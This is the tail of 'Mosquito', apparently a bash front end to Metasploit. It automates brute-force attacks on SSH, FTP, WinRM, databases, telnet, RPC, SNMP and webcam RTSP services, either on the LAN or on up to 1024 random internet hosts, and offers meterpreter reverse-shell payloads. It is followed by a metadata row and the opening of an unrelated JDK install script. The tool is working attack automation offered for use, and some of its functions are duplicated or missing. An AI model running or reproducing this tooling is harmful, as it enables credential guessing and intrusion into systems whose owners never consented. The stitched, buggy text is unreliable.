echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force ssh service :: done
#
sh_quatro () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} ssh_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource ssh_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 147.162.198.31 41.225.253.172" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource ssh_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 250 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource ssh_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# brute_force ftp service(s) :: done
#
sh_cinco () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} ftp_brute resource_"${Reset};
sleep 1
IPADDR=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'}` # grab local ip address
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;setg LHOST $IPADDR;resource ftp_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 143.191.125.117 183.17.237.229" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;setg LHOST $IPADDR;resource ftp_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 400 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource ftp_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# brute_force http (CVE) services :: done
#
sh_six () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} http_CVE resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource http_CVE.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 154.194.198.245 66.199.38.187" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource http_CVE.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 250 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource http_CVE.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force winrm|wsman|wsmans service(s) :: done
#
sh_seven () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} winrm_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
payload=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "\nSellect exploitation Payload:" --radiolist --column "Pick" --column "Option" TRUE "windows/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_tcp" --width 353 --height 195) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;setg PAYLOAD $payload;resource winrm_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 154.208.147.160 205.65.133.91" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;setg PAYLOAD $payload;resource winrm_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 800 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;setg PAYLOAD $payload;resource winrm_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force mysql service :: done
#
sh_oito () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} mysql_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource mysql_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 213.171.197.190 46.242.242.249" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource mysql_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 500 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource mysql_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force mssql service :: done
#
sh_nine () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} mssql_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource mssql_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 185.99.212.190 180.86.155.12" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource mssql_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 500 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource mssql_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force telnet service :: done
#
sh_ten () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} telnet_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource telnet_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 95.38.18.209 201.18.152.50" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource telnet_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 600 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource telnet_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force RPC service :: done
#
sh_onze () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} rpc_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource rpc_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 205.72.213.47 199.197.116.190" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource rpc_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 800 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource rpc_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force snmp service :: done
#
sh_twelve () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} snmp_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource snmp_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 192.249.87.128 24.24.40.36" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource snmp_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 250 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource snmp_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# Brute Force postgres service :: done
#
sh_twelve () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} postgres_brute resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;resource postgres_brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 205.88.183.168 185.99.212.190" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;resource postgres_brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 500 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;resource postgres_brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
sh_quatorze () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} rtsp_url_brute resource_"${Reset};
sleep 1
IPADDR=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'}` # grab local ip address
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" FALSE "Scan user input rhosts" TRUE "Random search WAN for rhosts" --width 330 --height 200) > /dev/null 2>&1
echo "$RANGE" > ip_range.txt
#
# Sellect the type of scan to use
#
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24"${Reset};
msfconsole -q -x "setg RHOSTS $RANGE.0/24;setg LHOST $IPADDR;resource rtsp-url-brute.rc"
#
# scanning user inputs
#
elif [ "$scan" = "Scan user input rhosts" ]; then
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 201.203.27.251 159.121.101.207" --width 450) > /dev/null 2>&1
msfconsole -q -x "setg RHOSTS $rhost;setg LHOST $IPADDR;resource rtsp-url-brute.rc"
#
# scanning ramdom WAN hosts
#
elif [ "$scan" = "Random search WAN for rhosts" ]; then
echo "${BlueF}[☠]${white} Random Search WAN for rhosts"${Reset};
sealing=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Limmit the number of rhosts to find\nDefault: 700 (max = 1024)" --width 300) > /dev/null 2>&1
max="1024"
rm -f 1024 > /dev/nul 2>&1
## Make sure the LIMMIT value did not have exceded the max allowed
if [ $sealing -gt $max ]; then
echo ${RedF}"[x]${white} LIMMIT SET TO HIGTH:${RedF}$sealing${white}, SETTING TO MAX ALLOWED.."${Reset};
sealing="1024"
sleep 1
fi
echo "${BlueF}[☠]${white} Limmit the search to: $sealing hosts"${Reset};
msfconsole -q -x "setg RANDOM_HOSTS true;setg LIMMIT $sealing;setg LHOST $IPADDR;resource rtsp-url-brute.rc"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
sh_easter_egg () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} 🦟easter_egg🦟 ${BlueF}:[${YellowF}BlueTeam${BlueF}]${white}"${Reset};
sleep 1
## Local variable declarations
IPADDR=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'}` # grab local ip address
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" FALSE "Scan Local Lan" TRUE "Scan $IPADDR" --width 330 --height 180) > /dev/null 2>&1
if [ "$scan" = "Scan Local Lan" ]; then
echo "${BlueF}[☠]${white} Scanning Local Lan: $RANGE.0/24🦟"${Reset};
msfconsole -q -x "workspace -a mosquito;db_nmap -sS -v -Pn -T5 -O --top-ports 1000 --open --script=vuln $RANGE.0/24;db_nmap -sV -T5 -Pn --script=freevulnsearch.nse,vulners.nse $RANGE.0/24;hosts -C address,name,os_name,purpose,info;services -c port,proto,state;workspace -d mosquito"
elif [ "$scan" = "Scan $IPADDR" ]; then
echo "${BlueF}[☠]${white} Scanning Local Machine: $IPADDR🦟"${Reset};
msfconsole -q -x "workspace -a mosquito;db_nmap -sS -v -Pn -T5 -O --top-ports 1000 --open --script=vuln $IPADDR;db_nmap -sV -T5 -Pn --script=freevulnsearch.nse,vulners.nse $IPADDR;hosts -C address,name,os_name,purpose,info;services -c port,proto,state;workspace -d mosquito"
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
###################################################################
# * 🦟 MOSQUITO MAIN MENU 🦟 * #
###################################################################
sh_main () {
rm -f 1024 > /dev/nul 2>&1
}
# loop forever
while :
do
clear
echo "---"${BlueF}
cat << !
🦟__________
_______🦟________________________ ___(_) _ /______🦟
__ __ __ \ __ \_ ___/ __ / / / /_ /_ __/ __ \\
🦟_ / / / / / /_/ /(__ )/ /_/ // /_/ /_ / / /_ / /_/ /
/_/ /_/ /_/\____//____/ \__, / \__,_/ /_/ \__/ \____/v:$ver
/_/ 🦟 Author:r00t-3xp10it 🦟
!
echo "" && echo "${BlueF} ${RedF}:${BlueF}Framework Description${RedF}:${BlueF}"${Reset};
cat << !
Mosquito uses metasploit auxiliary modules + nmap nse + resource files
to be abble to automate remote brute force tasks over WAN/LAN networks.
'scan Local Lan, scan user inputs (rhosts),Search WAN for random hosts'
!
echo "---"
echo " ${RedF}:${BlueF}USER${RedF}:${white}$user ${BlueF}ENV${RedF}:${white}$EnV ${BlueF}INTERFACE${RedF}:${white}$InT3R ${BlueF}ARCH${RedF}:${white}$ArCh ${BlueF}DISTRO${RedF}:${white}$DiStRo ${BlueF}HOSTNAME${RedF}:${white}$htn"${Reset};
cat << !
╔──────────╦───────────────────────╦────────────────────────────────────────╗
║ OPTION ║ RESOURCE FILE ║ DESCRIPTION ║
╠──────────╬───────────────────────╬────────────────────────────────────────╣
║ 1 ║ geo_location ║ scan remote hosts geo location ║
║ 2 ║ brute_force ║ scan - brute most commom ports ║
║ 3 ║ ms17_010 ║ scan - brute remote smb service ║
║ 4 ║ ssh_brute ║ scan - brute remote ssh service ║
║ 5 ║ ftp_brute ║ scan - brute remote ftp service ║
║ 6 ║ http_cve ║ scan - brute remote http service ║
║ 7 ║ winrm_brute ║ scan - brute remote winrm service ║
║ 8 ║ mysql_brute ║ scan - brute remote mysql service ║
║ 9 ║ mssql_brute ║ scan - brute remote mssql service ║
║ 10 ║ telnet_brute ║ scan - brute remote telnet service ║
║ 11 ║ rpc_brute ║ scan - brute remote rpc service ║
║ 12 ║ snmp_brute ║ scan - brute remote snmp service ║
║ 13 ║ postgres_brute ║ scan - brute remote postgres serv ║
║ 14 ║ rtsp_url_brute ║ scan for remote live webcam's url's ║
╠──────────╩───────────────────────╩────────────────────────────────────────╣
║ E - Exit mosquito ║
╚───────────────────────────────────────────────────────────────────────────╣
Suspicious-Shell-Activity©🦟redteam @2019🦟╝
!
echo "${BlueF}[☠]${white} mosquito framework"${Reset}
sleep 1
echo -n "${BlueF}[${GreenF}➽${BlueF}]${white} Chose Option number${RedF}:${white}"${Reset}
read choice
case $choice in
1)
sh_one # geo_location function
;;
2)
sh_two # most common ports brute force function
;;
3)
sh_tree # ms17_010 (smb) function
;;
4)
sh_quatro # SSH function
;;
5)
sh_cinco # FTP function
;;
6)
sh_six # HTTP CVE function
;;
7)
sh_seven # WINRM snmp function
;;
8)
sh_oito # MYSQL function
;;
9)
sh_nine # MSSQL function
;;
10)
sh_ten # TELNET function
;;
11)
sh_onze # RPC function
;;
12)
sh_twelve # SNMP function
;;
13)
sh_treze # POSTGRES function
;;
14)
sh_quatorze # RTSP (webcams) function
;;
easter_egg)
## Mosquito Hidden option
# whitehat - search for vuln's/cve's in local lan
sh_easter_egg
;;
e|E)
echo "${BlueF}[${YellowF}i${BlueF}]${white} Closing framework 🦟Bzzzz."${Reset};
service postgresql stop | zenity --progress --pulsate --title "🦟 PLEASE WAIT 🦟" --text="Stoping postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
rm -f ip_range.txt > /dev/nul 2>&1
exit
;;
h|H)
echo "${BlueF}[${YellowF}i${BlueF}] [${YellowF}EXECUTE${BlueF}] sudo ./mosquito.sh -h"${Reset};
service postgresql stop | zenity --progress --pulsate --title "🦟 PLEASE WAIT 🦟" --text="Stoping postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
exit
;;
*)
echo "${BlueF}[${RedF}x${BlueF}]${white} '${RedF}$choice${white}': is not a valid Option 🦟Bzzzz."${Reset};
sleep 2 && sh_main
;;
esac
done
| true |
1686fee9b4a847688c8135bae1a25726a66ea7fd
|
Shell
|
ua-eas/ksi
|
/components/jdk/jdk-1.6.0_37/_install.sh
|
UTF-8
| 1,955 | 3.578125 | 4 |
[] |
no_license
|
#
# component install script for jdk-1.6.0_37
#
# n.b. This install includes the third-party jtool.jar library,
# which is distributed separately from the main JDK.
#
#
# Globals.
distfile="jdk-6u37-linux-x64.bin"
unpacksto="jdk1.6.0_37"
jtooljar="jtool-0.1-SNAPSHOT.jar"
#
# Make the component build and log directories.
echo "[-install-] Creating ${COMPONENT_VERSION_BUILDDIR} ..."
mkdir -p ${COMPONENT_VERSION_BUILDDIR}
echo "[-install-] Creating ${COMPONENT_BUILDLOGSDIR} ..."
mkdir -p ${COMPONENT_BUILDLOGSDIR}
#
# Copy the distribution file to it.
echo "[-install-] Copying ${INSTALLER_COMPONENT_VERSIONDIR}/${distfile} to ${COMPONENT_VERSION_BUILDDIR} ..."
cp ${INSTALLER_COMPONENT_VERSIONDIR}/${distfile} ${COMPONENT_VERSION_BUILDDIR}
#
# Turn on execute bit.
echo "[-install-] Turning on execute bit ..."
chmod +x ${COMPONENT_VERSION_BUILDDIR}/${distfile}
#
